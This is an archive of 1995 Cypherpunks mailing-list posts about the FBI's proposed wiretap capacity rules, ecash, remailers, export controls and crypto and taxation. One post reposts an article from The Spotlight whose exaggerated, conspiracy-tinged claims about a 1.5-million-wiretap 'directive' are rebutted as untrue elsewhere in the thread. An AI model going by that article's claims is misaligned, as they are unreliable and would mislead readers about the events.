Nietzsche is not a recognised authority on the US consititution nor
are his works on ethical systems particularly definitive. At best he
points out the deficencies in the ethical systems of Kant and hints
at a limitation of reasoned approaches to ethics. His ethics of
Will are hardly a fully finished system of ethics. If you want a 
contemporary system of ethics you would find Rorty, Habbermass or
Singer a far better choice.

Even within the Nietzschian system of ethics it is very clear that 
listening in on the telephone conversations of "the botched and the
bungled" would lie well within the rights of super-man. Indeed he
is very explicit that there is no logical need for these people to
have rights of any sort. Their lives are at the disposal of the great
leader.

The justification the NSA relies upon is the fact of a Federal law 
that makes it lawful to conduct wiretaps. I think the FBI have gone 
off into gaga land with the magnitude of their request. This is a good
thing. They are not likely to get anything as a result. 


	Phill









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tony266@vabeach.email.net
Date: Fri, 3 Nov 1995 09:48:16 +0800
To: cypherpunks@toad.com
Subject: What!!!
Message-ID: <9511021825.S84530450@vabeach.email.net>
MIME-Version: 1.0
Content-Type: text/plain


Can someone tell me this cypherpunks is all about???




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 3 Nov 1995 10:40:14 +0800
To: hallam@w3.org
Subject: Re: FBI seeks huge wiretapping system
In-Reply-To: <9511022308.AA08199@zorch.w3.org>
Message-ID: <199511022333.SAA06934@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



hallam@w3.org writes:
> 
> >Indeed, I have searched both the constitution and my collected works
> >of Nietzsche and found no reference to the inalienable right of
> >governments to listen in on any conversations, let alone the 1% of
> >conversations the FBI wants access to. 
> 
> Nietzsche is not a recognised authority on the US consititution nor
> are his works on ethical systems particularly definitive.

I was being facetious. The point is that the government has no
inherent right to tap our phones -- indeed, it didn't do so for nearly
the first 200 years of our existance, and we did just fine -- better,
in fact. Who among us has felt SAFER since they gained the ability?
Has anyone been feeling more and more safe with time, since the more
and more draconian laws granting the government more and more
authority should have been "fixing" things, right?

> Even within the Nietzschian system of ethics it is very clear that 
> listening in on the telephone conversations of "the botched and the
> bungled" would lie well within the rights of super-man. Indeed he
> is very explicit that there is no logical need for these people to
> have rights of any sort. Their lives are at the disposal of the great
> leader.

Actually, thats a complete misinterpretation of Nietzsche, but thats
another story.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Fri, 3 Nov 1995 09:47:48 +0800
To: cypherpunks@toad.com
Subject: The ITAR, you don't leave home without it.
Message-ID: <Pine.3.89.9511021819.B29985-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain


A funny thought just occurred to me. Micheal Froomkin was recently saying
that the wonderful ITAR applies to American citizens regardless of country
of location. Wouldn't this inane technicality apply to David Chaum in 
Holland? He is American, right? Ever get any problems at US customs David?
The Digicash trial software certainly had crypto in it. I don't remember 
any export controls.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Mon, 6 Nov 1995 05:20:06 +0800
To: cypherpunks@toad.com
Subject: Meeting: Nov. 4 in Austin, TX
Message-ID: <199511030104.TAA09845@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi,

A reminder to those in the central Texas area on Saturday (Nov. 4, 1995)
from 6-8pm. The Austin chapter will be meeting at Ted's Greek Restaraunt on
the 400 block of Congress (next to Oscar Snowden's).

We will be trying to wrest control of the last couple of tables in the rear.

Issues we will be discussing:

     *  Further interests of the members and forming working groups.

     *  Make further arrangements to start doing PGP key signing services
        at the end of the monthly EFF meeting.

     *  Discuss doing a 1-hour video on the basic ideas and issues of
        cryptography and current society.

     *  Invitation from CT-LUG to come to their next build-up which is
        scheduled for Nov. 18 but is tentative for now. If all works well
        this may be an opportunity to play with some re-mailer software
        under Linux.

Hope to see some of you there!

                                              Jim Choate
                                              ravage@einstein.ssz.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Fri, 3 Nov 1995 09:51:49 +0800
To: Laurent Demailly <cypherpunks@toad.com
Subject: Re: ecash remailer
In-Reply-To: <9511022349.AA01867@hplyot.obspm.fr>
Message-ID: <9511030011.AA09279@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>No. please get first hand facts. I have 'laundered' more than e$18000, by small 
>amounts of a couple of e$, and *no* bucks were lost(1). I

I did, I got a direct report from a person who is extreemly well known in
the field of computer networks and security. A second person who is well
known in the UNIX and scurity areas reported the same problem.

The fact that you can operate the system correctly does not mean that it
does not have bugs. These people were looking to break the system. 

>but hey... if
>your wallet has an hole, of if you throw away your money, you won't
>whine to the ATM, would you ?

Yes, and I would win. Under regulation E of the Federal Reserve code
my liability is limited to $50. The scenario you describe is analogous
to my cash being stuck in the machine.

This is the essential regulatory problem that e-cash faces. Regardless of the
contract disclaimer it is by no means certain what liability Mark Twain have.
The charges are significantly higher than those for credit cards, I see no
validity in the argument that the small fees mean that a small liability 
should be incurred.


	Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant" <mark@unicorn.com>
Date: Fri, 3 Nov 1995 04:15:39 +0800
To: alt.privacy.anon-server@news.news.demon.net
Subject: New Mixmaster Remailer
Message-ID: <Pine.3.89.9511021922.A15602-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain



This is the official announcement for the Ecafe Mixmaster Remailer that
has been running on ecafe.org for testing purposes for the last few weeks.
The address to send to is mixmaster@remail.ecafe.org, message reordering
is enabled with a poolsize currently set to two (which may be increased
when we get more traffic), and the key is attached. The remailer is
physically located in the UK.

For more information, check out the Web page at http://www.ecafe.org/~remail/

	Mark

Here is the public key for Ecafe Remailer

=-=-=-=-=-=-=-=-=-=-=-=
ecafe-mix mixmaster@remail.ecafe.org fff0d827161069a26ca44dead777c9ec 2.0.1

-----Begin Mix Key-----
fff0d827161069a26ca44dead777c9ec
258
AATgcIZ9GIj6VEZ2UmDO9BGmGVY5tZHVQp+2rChG
0E+lcD8lrHlWGwc/ea9Ycj8z2HGdWZl5ptXqfabf
YenIyO7YRr7teAzAAFmkBuwgBGUcpJUvIOjWlXBo
OGnku0AQYqOBDZSfknT+dAP01N82qDN13E6dUhEW
/0hdDNVghmsy2wAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
-----End Mix Key-----








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Sun, 5 Nov 1995 20:06:04 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: FBI seeks huge wiretapping system
In-Reply-To: <199511022239.RAA06803@jekyll.piermont.com>
Message-ID: <199511030019.TAA19297@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Today's (11/2) NYT carries a Markoff story on The 1% Solution at the top 
left of the front page. The article mentions that the DT appropriation has 
been cut out of the current budget bill (last week ?). It points out that 
since the White House officially plans to veto the current bill anyway, 
they're unlikely to waste too much effort on sticking things into it.

Supposedly they want three zones of wiretap capability: (roughly) 1% in 
cities, 0.5% in suburbs, 0.25% in the country.

We've discussed the grave concern that digital equipment makes everything
much easier to handle. I would like to know what sort of technological 
assurances we could possibly obtain that the arbitrary 1%/0.5%/0.25% figures
couldn't trivially be bumped up to, say, 10%/5%/2.5% with a little bit of
programming. Is this a legitimate worry ?  If the FBI gets its way on this,
how far will we be from the day when 1% is merely a parameter in a wiretap
control program ?  

I don't know enough about telephone switches etc. (digital or otherwise) to
know whether this is just idle speculation.

-Futplex <futplex@pseudonym.com>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 5 Nov 1995 02:58:28 +0800
To: cypherpunks@toad.com
Subject: Re: Crypto & Taxes [WAS Re: Cybersecurity]
Message-ID: <199511030524.VAA03406@ix5.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


A couple of weeks ago, Michael Froomkin <froomkin@law.miami.edu> wrote:
>> > fully applied crypto (e. g. fully anonymous digital cash) 
>> > makes it essentially impossible to base a tax system on income.

>Hold on.  This is more "factoid" than "fact":  recall that income is PAID 
>by people as well as EARNED by people.  Most payers have easily 
>detectible physical presence and assets that can easily be attached by 
>regulators.   It will be a cold day before, e.g., my employer agrees not 
>to report my earnings.  And the same is true for most employers in most 
>industries.  

Unfortunately, this is true, at least for people whose employers are
subject to income tax somewhere.  Taxing businesses doesn't make sense
economically - you could collect almost as much money with far less disruption
to the underlying economy by taxing it as wages for workers and
dividend or interest payments to owners* rather than inside the business itself,
substantially reducing the accounting workload of businesses**.
But it's still very attractive to governments, not only as a lever for
implementing social policy and extracting cooperation, but as a critical tool
to force businesses to report wages payed to employees - I don't know if
law.miami.edu is a taxable business, but for most employers, if they don't
report the wages they paid to their employees, but do report all their
revenue, they get taxed on the additional profit, instead of the employee
getting hit with the tax; most people I know who've been paid "under the table"
have been working for small businesses that are also not reporting cash
revenues.

Of course, if a business isn't _spending_ money on employees, but is just
contracting for work performed by an Anguillan corporation, they still have
receipts for expenses, and the financial arrangements between the Anguillan
corporation and any of its US employees aren't really their concern....

>And if it ever stops being true, we'll just get VAT, and VAT inspectors.  
>So the line about death and taxes remains as true as ever, crypto or no.

Value is really hard to measure in a service economy.   Most of my work over
the last N years has been talking to people, typing on keyboards,  
going places on airplanes to talk to other people and type on other keyboards,
and occasionally handing people piles of collated and stapled dead trees,
a racket for which people pay my employer lots of money***.  Where's the value?
When was it added?  If the Tax Collectors don't see people handing my employer
lots of money, can they demonstrate how much money they can confiscate?



- - - - - -

* this misses payments to foreign owners and taxes on foreign customers,
but any government foolish enough to discourage investment by foreigners
and sales to foreign customers deserves to be blamed heavily for lost jobs..

** US businesses spend approximately 40% as much calculating taxes as they
do _paying_ them...

*** My previous employer was very good at taking metal, sand, and fermented
dinosaur parts, and shaping them into boxes and strings that people would 
give them money for; they were extremely optimistic that they could get lots
of people to also pay them money for sending them people to talk about boxes
and strings and getting other people to pay _them_ for talking and banging
on keyboards.  They shouldn't have been quite so optimistic, and now
I'm in the racket on my own, having not yet acquired overseas corporations
to shelter my income through :-)
#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Fri, 3 Nov 1995 14:38:20 +0800
To: cypherpunks@toad.com
Subject: Re: FBI Wants to Wiretap One of Every 100 Phones in Urban Areas
In-Reply-To: <9511030810.AA0038@cnct-gw.new-york.net>
Message-ID: <Pine.ULT.3.91.951102220145.25597C-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 3 Nov 1995 clarkm@cnct.kom wrote:

> Thanks for this item!  Two little excerpts jump out at me.

Gee, I hope they didn't spook you too badly when they jumped out at you 
like that. I can tell you're a little jumpy.

> > Last year, federal and state courts authorized 1,154 wiretaps, of which
> > 48 percent
> 
> [snip]
> 
> > "People are starting to say that seems awfully high," Dempsey said, noting 
> > that
> > the overall level of such surveillance activity is now a total of 20,000 
> > to 25,000
> > intercepts nationwide over an entire year.
> 
> So what is it?  1,154 wiretaps?  Or 20,000?

Easy: both. 1,154 wiretaps, and 20K to 25K intercepts, which includes both 
wiretaps and other interceptions, i.e., recording which phone numbers you 
call but not actually listening to the conversations.

Get out of Dodge.

> FBI Director Louis Freeh testified under oath to 1,157.  The FBI was asked
> for the data to support those numbers.  The FBI refused to release them 
> until the year 2002.
> 
> The FBI is being sued under FOIA to support Freeh's sworn testimony.  (Of
> course, he used different numbers at different times....)

By whom is the FBI being sued? What is the case number? Who are the 
lawyers? What are their Bar numbers? How many times have they been 
disciplined for bringing frivolous suits?

> One last thing.
> 
> What's so special about the year 2002?  

Obviously, it is two elections from now, when the UN will invade the US 
to impose the rule of the Anti-Christ.

Oops, I wasn't supposed to say that.

- -rich

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMJmyX43DXUbM57SdAQGSpAQAw5sutFZdFyNu24bU1Pvd5n/BitCO/6/X
7ZywmguZTtduCCjfvAe2zD7KWu/Mlxrm3ATQSnUH6Vyjr1BAo/TnbrZzjdjWRQw1
S8n7PtLbDiHPOxgocC4JYnITYO5Lasx81V5lhJv5ifC0W8QGaqdLIZnfvws4K/N+
ONHnqzjRwSc=
=FSoO
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 4 Nov 1995 19:30:56 +0800
To: clarkm@cnct.com
Subject: Re: FBI Wants to Wiretap One of Every 100 Phones in Urban Areas
Message-ID: <199511030709.XAA23931@ix8.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:03 AM 11/3/95, clark.matthews@paranet.org wrote:
>Thanks for this item!  Two little excerpts jump out at me.  They follow:
>> Last year, federal and state courts authorized 1,154 wiretaps, of which 48 
>> percent ....
>> "People are starting to say that seems awfully high," Dempsey said,
noting that
>> the overall level of such surveillance activity is now a total of 20,000 
>> to 25,000 intercepts nationwide over an entire year.

>So what is it?  1,154 wiretaps?  Or 20,000?

Perhaps that's 1154 wiretap victims, with an average of 20 intercepts each?

In a separate article, Clark posted estimates that ranged from
500K - 1.5M people could be wiretapped, depending on how many people
are in the 1%/.5%/.25% zones.  It's worse than that - if they're tapping
the average victim for (say) 3 months, that's 4 times as many victims....
And just how many cops do they plan to hire to watch all these phones?
Computers can help some, especially for data, but who's going to read it all,
even after the fancy pattern recognition systems pick out the possible good
stuff.

>FBI Director Louis Freeh testified under oath to 1,157.  The FBI was asked
>for the data to support those numbers.  The FBI refused to release them 
>until the year 2002.  [....]
>One last thing.
>What's so special about the year 2002?  

Statute of limitations?  :-)
#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Fri, 3 Nov 1995 15:50:12 +0800
To: clarkm@cnct.com
Subject: [NOISY] Re: Clinton Administration Plans 1.5 MILLION WIRETAPS
In-Reply-To: <9511030814.AA0039@cnct-gw.new-york.net>
Message-ID: <Pine.ULT.3.91.951102221403.25597D-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 3 Nov 1995 clarkm@cnct.com wrote:

Ah, Clark graces us with his presence. See articles
<46kf2u$4ck@mars.cnct.com> and <45ch8o$915@mars.cnct.com>. I especially
enjoyed <44l7r9$dsv@mars.cnct.com>.

>                        From THE SPOTLIGHT
>                   300 Independence Avenue, S.E.
>                       Washington, DC  20003

Here's a little more information on this fine publication, which is in the
forefront of the struggle to expose the truth about the United Nations'
responsibility for the bombing of the Oklahoma Federal Building. Note the
second Library of Congress topic classification. The Spotlight is often
cited in alt.revisionism. Larger University libraries usually carry it;
I know Stanford and Berkeley do.

TITLE:    Spotlight (Washington, D.C.)
          The Spotlight.
          The Spotlight (Washington)
IMPRINT:  Washington, Liberty Lobby.
          v. ill. 39 cm.
TOPICS:   United States--Politics and government--1969---Periodicals.
          Antisemitism--Periodicals.
          Conservatism--United States--Periodicals.
NOTES:    Weekly (except two issues combined into one at beginning of year)
          v. 2, no. 16-     Apr. 19, 1976-
          Continues: National spotlight
          Language: English   Year: 1976-
          ISSN 0191-6270

>                       Technology & Liberty
>                         November 13, 1995
> 
> 
>       ADMINISTRATION PLANS 1.5 MILLION TELEPHONE INTERCEPTS
> 
>                         By Clark Matthews
>                    clark.matthews@paranet.org
> 
> Janet Reno's Justice Department and the FBI have directed U.S.
> telephone companies to prepare for up to 1.5 million
> simultaneous, electronic intercepts on Americans' telephones.

This is not true. This is a trial balloon, not a directive;  it's a first,
wet dream draft at the beginning of a public comment period. It is dead 
on arrival.

It will not be implemented, not if we have any say in the matter, and we
do. Please do chime in, though, based on EPIC's responsible analysis and
recommendations. 

> The same directive requires the nation's phone companies to
> complete the necessary modifications to their equipment to create
> this massive surveillance apparatus from America's public
> telephone networks.  Telephone companies are directed to have
> these capabilities in place by October 28, 1998, one week before
> the 1998 elections.

This is not true.

[Tin-foil-hat-tinged plagiarism of EPIC's alert deleted]

> The administration's eavesdropping diktats are buried in a set of
> technical "capacity requirements" that telephone companies are
> expected to meet in order to comply with the CALEA law.  The
> capacity requirements appear on pages 53643-53646 of the Federal
> Register for October 16, 1995.  Computer users can access this
> document electronically on the internet from the Electronic
> Privacy Information Center (http://www.epic.org) or by using wais
> (wais.access.gpo.gov).

The second and third sentences are true. If you are a US citizen (natural 
born White Sovereign State Citizen or otherwise), please follow up on 
them. Let your voice be heard.

The first sentence has at least four readily apparent logical and 
factual flaws.

> or businesses.  They can also be programmed to monitor telephone
> conversations, intercept faxes, and record communications
> sessions between computer modems, including computer passwords
> and digital transactions.

Not if they're encrypted, they can't :-)

> Here is a breakdown of the scope of the federal surveillance
> described by the capacity requirements:

[All plagiarized from the EPIC alert; a few errors, but nothing major]

> And since "major cities" are "high interest" areas, the actual
> number is more likely to approach one million or more.  Even
> these figures don't tell the whole story.  The Justice Department
> directives have a built-in vagueness that allows areas to be re-
> defined.  They can become "high-interest" hotspots at any time,
> under any circumstances.  A currency crisis, for instance.  Or a
> hotly contested election.  Or perhaps a mysterious bombing
> provocation in the midwest.

This is completely untrue. Cite please?

> Furthermore, telephone companies do not have the luxury of
> meeting the minimum surveillance requirements.  It's a
> technological reality that they must modify their equipment to
> meet the maximum requirements.  That's because the FBI can re-
> define their surveillance responsibilities at any time, by
> branding their customers as "interesting".  

Cite?
 
>                    WRITE YOUR REPRESENTATIVES

Yes, please do. The facts are rather disturbing. Clark's transcription 
leaves a little to be desired, so I quote EPIC:

WHAT YOU CAN DO:

(a) Express support for Rep. Bob Barr (R-GA), a former federal prosecutor 
and leading Congressional
opponent of the FBI's request for wiretap funding: 

     Rep. Bob Barr
     U.S. House of Representatives
     1607 Longworth Building
     Washington, DC 20515
     (202) 225-2931


(b) Submit comments to the FBI. Object to the "percentage approach" to
wiretap capacity. Urge the FBI to follow the current measurement of
wiretapping, as reported annually by the Administrative Office of the U.S.
Courts, which considers the actual number of wiretaps authorized. If you
are a telephone customer, ask the FBI to address the privacy risks of
unauthorized, illegal, or excessive wire surveillance. Comments should be
submitted in triplicate to the Telecommunications Industry Liaison Unit
(TILU), Federal Bureau of Investigation, P.O. Box 220450, Chantilly, VA
22022-0450. Send copies of your comments to EPIC (alert@epic.org) and
Congressman Barr. 

                 ** Comments must be received by November 15, 1995. **

(c) If you represent or work for a telecommunications company, equipment
manufacturer, or service provider, assess carefully the cost and liability
that this proposed federal regulation may impose on your company and the
risk that it may expose your customers to illegal wiretapping. If you are
interested in challenging the final FBI rule, contact EPIC. 

[BUAF of a birdie deleted]

- -rich


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMJnAZ43DXUbM57SdAQF5cAP8CebPae9psvfau4nUGUr0bi81cuqQEjlb
jm0va0q3tlRV18Xd+vXUOjjd6+Mwkjfd0kh74q2IUWbSVHA2ECy5sHgF5oGoSiLP
WJdh3nTGlrtrj/oiYQloaun/lUiq27L4Z6sQPNNNwNmldt8zzPCRJUBACBg0+qLS
kmxvepC/7Uo=
=3F8Z
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <wilcoxb@nagina.cs.colorado.edu>
Date: Fri, 3 Nov 1995 14:36:15 +0800
To: Enzo Michelangeli <enzo@ima.com>
Subject: [NOISE] Re: censored? corrected [Steve Pizzo cited in The Spotlight]
In-Reply-To: <Pine.LNX.3.91.951103114116.20782B-100000@ima.net>
Message-ID: <199511030614.XAA02702@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

> On Thu, 2 Nov 1995, Rich Graves wrote:
> 
> > > 
> > >    In Hong Kong, the Internet wasn't quite strangled, but the British
> > > authorities who control that colony managed to throttle free electronic
> > > speech with the rest of the world until everything was bottlenecked into
> > > a few little-known satellite links.
> > 
> > Hmm, few specifics here. I wonder if they would care to elaborate. Nah.
> 
> Don't waste your time with that idiot, he doesn't know what he's talking
> about. The 1-week partial black-out here in Hong Kong happened because some
> providers had ignored some licencing requirements, and has been quickly
> solved once they agreed to comply.


That's one way to look at it.  Of course since the "license 
requirements" had to do with some obscure administrivia that nobody
thought would apply to ISP's, none of the 6 or so ISP's in Hong Kong
had thought to apply for it.  One has to wonder why the gov't pulled
the plug on 5 of them without so much as a warning, much less a
chance to comply.


Did I say 5?  Oh yes.  The largest HK ISP-- and the one with closest
ties to the government-- had gone ahead and applied for the license
just a couple of weeks before the blackout.  Corruption is the modus
operandi in HK, so I wouldn't be at all surprised if that one ISP
got a special favor by being warned of the impending black-out, or
even if it had a hand in instigating it.


I'm sure you'll correct me if I've got any of my facts wrong.


(c'punks relevance:  (parts of) the Net is still vulnerable to
governmental blackout.  Is this relevant?  Well, hardly, but perhaps
interesting.  And at least I flagged it.)


Regards,

Bryce

signatures follow


            "To strive, to seek, to find and not to yield."   
    <a href="http://ugrad-www.cs.colorado.edu/~wilcoxb/Niche.html">

                          bryce@colorado.edu                   </a>



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01

iQCVAwUBMJmy8PWZSllhfG25AQHUygP/QKCwtGlzRRaJtCANUgiJgt+noq0RJKWe
zpthAqKRJEa0kP1/zZBkk0Qkj/+HJWAJZ1+i/9R887cDkyD8JZSu2XJ4pXB4mpsv
9rgxH4ffj8oxvy9e313/Z7C2zm7x1O3dwvnkKDojg8LuUBCTvHxZo5iwKXNqExYv
w/B0Fxbv0V8=
=BPjm
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 3 Nov 1995 12:50:06 +0800
To: cypherpunks@toad.com
Subject: Radiation Detectors from Aware Electronics
Message-ID: <199511030430.XAA07086@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



There have been several requests for information on the company that
makes the radiation detectors with RS232 interfaces that I mentioned.

Here is how to reach them:

Aware Electronics
P.O. Box 4299
Wilmington, DE 19807
Phone (800) 729-5397
      (302) 655-3800


Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 3 Nov 1995 14:55:37 +0800
To: cypherpunks@toad.com
Subject: Re: What!!!
Message-ID: <acbef6c303021004c367@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:25 PM 11/2/95, tony266@vabeach.email.net wrote:

>Can someone tell me this cypherpunks is all about???

Grammar not best subject his. List sense make after read for time.

--Klaus!

More seriously, when you subscribed you undoubtedly got a "Welcome"
message. I suggest you read it.

Reading topics that interest you on the list is the best way to learn what
it "is all about." The Cypherpunks list archives and Cyphernomicon are also
useful. They are in various places, including these Web sites:

http://www.hks.net/cpunks/index.html

http://www.oberlin.edu/~brchkind/cyphernomicon/

--Tim May



Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: clarkm@cnct.com
Date: Sun, 5 Nov 1995 02:53:55 +0800
To: cypherpunks@toad.com
Subject: Re: FBI Wants to Wiretap One of Every 100 Phones in Urban Areas
Message-ID: <9511030810.AA0038@cnct-gw.new-york.net>
MIME-Version: 1.0
Content-Type: text/plain


Thanks for this item!  Two little excerpts jump out at me.  They follow:

> Last year, federal and state courts authorized 1,154 wiretaps, of which 48 
> percent

[snip]

> "People are starting to say that seems awfully high," Dempsey said, noting 
> that
> the overall level of such surveillance activity is now a total of 20,000 
> to 25,000
> intercepts nationwide over an entire year.

So what is it?  1,154 wiretaps?  Or 20,000?

FBI Director Louis Freeh testified under oath to 1,157.  The FBI was asked
for the data to support those numbers.  The FBI refused to release them 
until the year 2002.

The FBI is being sued under FOIA to support Freeh's sworn testimony.  (Of
course, he used different numbers at different times....)

One last thing.

What's so special about the year 2002?  

     
      .---.        .----------- *     ::::::::::::::::::::::::::::
     /     \  __  /    ------ *        clark.matthews@paranet.org
    / /     \(..)/    ----- *         ::::::::::::::::::::::::::::
   //////   ' \/ `   ---- *
  //// / // :    : --- *                     PERMISSION TO
 \\/ / * / /`    '--*                        COPY / REPOST
  \*/      * //..\\
       x-x-UU----UUx-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x
           '//||\\`  N E M O..M E..I M P U N E..L A C E S S I T
       x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x
     
     




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rob L <robl@on-ramp.ior.com>
Date: Sat, 4 Nov 1995 19:29:05 +0800
To: clarkm@cnct.com
Subject: Re: FBI Wants to Wiretap One of Every 100 Phones in Urban Areas
In-Reply-To: <9511030810.AA0038@cnct-gw.new-york.net>
Message-ID: <Pine.LNX.3.91.951103000534.12413A-100000@on-ramp.ior.com>
MIME-Version: 1.0
Content-Type: text/plain


> FBI Director Louis Freeh testified under oath to 1,157.  The FBI was asked
> for the data to support those numbers.  The FBI refused to release them 
> until the year 2002.
> 
> What's so special about the year 2002?  

Maybe he plans to retire and leave the country by then.. to find a more 
secure, less invasive Gov't to live under.. ;)

RobL
Rockford, Wa





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: clarkm@cnct.com
Date: Fri, 3 Nov 1995 13:33:13 +0800
To: cypherpunks@toad.com
Subject: Clinton Administration Plans 1.5 MILLION WIRETAPS
Message-ID: <9511030814.AA0039@cnct-gw.new-york.net>
MIME-Version: 1.0
Content-Type: text/plain




                      Used with Permission

                       From THE SPOTLIGHT
                  300 Independence Avenue, S.E.
                      Washington, DC  20003

                 Subscriptions:  (202) 546-5621


                      Technology & Liberty
                        November 13, 1995


      ADMINISTRATION PLANS 1.5 MILLION TELEPHONE INTERCEPTS

                        By Clark Matthews
                   clark.matthews@paranet.org

Janet Reno's Justice Department and the FBI have directed U.S.
telephone companies to prepare for up to 1.5 million
simultaneous, electronic intercepts on Americans' telephones.

The same directive requires the nation's phone companies to
complete the necessary modifications to their equipment to create
this massive surveillance apparatus from America's public
telephone networks.  Telephone companies are directed to have
these capabilities in place by October 28, 1998, one week before
the 1998 elections.

The Clinton administration's claimed authorization for this
massive high-tech domestic surveillance machine is the 1994
Communications Assistance for Law Enforcement Act (CALEA).  The
CALEA law is better known as infamous "Wiretap Access Bill",
which has been discussed many times in these columns over the
past 14 months.  The CALEA law continues to be a hot topic
because the proposed "Omnibus Counter-Terrorism Bill" of 1995
(H.R. 1710) contains provisions for setting up a national FBI
surveillance center and paying for the national eavesdropping
system with a 40% surcharge on all federal civil fines and
property seizures.  

                     "CAPACITY REQUIREMENTS"

The administration's eavesdropping diktats are buried in a set of
technical "capacity requirements" that telephone companies are
expected to meet in order to comply with the CALEA law.  The
capacity requirements appear on pages 53643-53646 of the Federal
Register for October 16, 1995.  Computer users can access this
document electronically on the internet from the Electronic
Privacy Information Center (http://www.epic.org) or by using wais
(wais.access.gpo.gov).

The "Capacity Requirements" published in the Federal Register
correspond to a minimum of 540,000 and a maximum of 1.5 million
simultaneous telephone "intercepts" in the United States.  These
electronic "intercepts" involve several different telephone
surveillance techniques.  They can record the telephone numbers
you call and the numbers of people who call you, and then match
the phone numbers in a special database "associating" you with
your friends, relatives, acquaintances, journalists, activists,
or businesses.  They can also be programmed to monitor telephone
conversations, intercept faxes, and record communications
sessions between computer modems, including computer passwords
and digital transactions.

Here is a breakdown of the scope of the federal surveillance
described by the capacity requirements:

 *   Category 3 -- In 75% of the nation, phone companies must be
     prepared to activate federal intercepts on a maximum of
     0.25% of all telephone subscribers, i.e. 250 telephones out
     of every 100,000.

 *   Category 2 -- Is ill-defined.  Phone companies in Category 2
     areas must make their equipment capable of supporting
     federal interceptions on a maximum of 0.5% of all
     subscribers, i.e. 500 telephones per 100,000

 *   Category 1 -- Includes ill-defined "high interest" areas
     like major cities, where phone companies must be prepared to
     surveil 1% of all telephones, i.e. 1,000 phones per 100,000 

                       WHAT THE NUMBERS MEAN

According to FCC statistics for 1993, there were at least 150
million telephone numbers in our country -- and these figures
omitted cellular phones, beepers, pagers, WATS lines, and other
non-switched telephone services.  Therefore Category 3 translates
into 0.25% of at least 112.5 million telephones -- 281,250
intercepts nationwide.  Assuming Category 2 equals 15% of the
nation's phones, it translates into 0.5% of 22.5 million phones,
another 122,500 potential wiretaps.  Category 1 is 1% of the
remaining 15 million phones:  that's 150,000 more people.  Add it
up: 553,750 intercepts, minimum.

